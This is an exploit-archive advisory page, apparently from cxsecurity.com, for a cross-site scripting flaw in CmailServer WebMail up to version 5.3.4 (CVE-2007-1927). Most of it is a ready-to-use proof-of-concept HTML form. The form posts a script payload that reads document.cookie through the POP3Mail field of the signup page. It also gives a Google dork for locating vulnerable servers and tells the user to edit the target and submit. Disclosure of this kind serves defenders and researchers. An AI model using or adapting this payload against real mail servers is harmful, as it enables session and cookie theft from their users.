Bug: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit (WLB-2007040036 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit
 Credit: ajann
 Date: 2007.04.11
 CWE: CWE-79 (Show similar)
 CVE: CVE-2007-1927 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes

<html>
<head>

<script>

//'=====================================================================
==========================
//'[Script Name: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[Dork : "inurl:/mail/signup.asp"
//'[Dork Ex. : http://www.google.com.tr/search?q=inurl:/mail/signup.asp&hl=tr&start=0&s
a=N
//'[S.Page : http://www.youngzsoft.net/
//'[Using : Please "action" edit and submit
//'=====================================================================
==========================

</script>

</head>
<title>Cmail XSS </title>
<body>

<Form Method="Post" Action="[target]/signup.asp">

<Input Type=Hidden Name=Signup Value="0">

<input type="hidden" name="Account" size="30">

<Input Type="hidden" Name="Pass" size="30" value="">

<Input Type="hidden" Name="RePass" size="30" value="">

<input type="hidden" name="UserName" size="30" value="">

<Input type="hidden" Name="Comment" size="30" value="">

<Input Name="POP3Mail" size="30"
value="<script>JavaScript:alert(document.cookie);</script>">

<Input Type="Submit" Value="Submit XSS">

</Form>

</body>
</html>

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com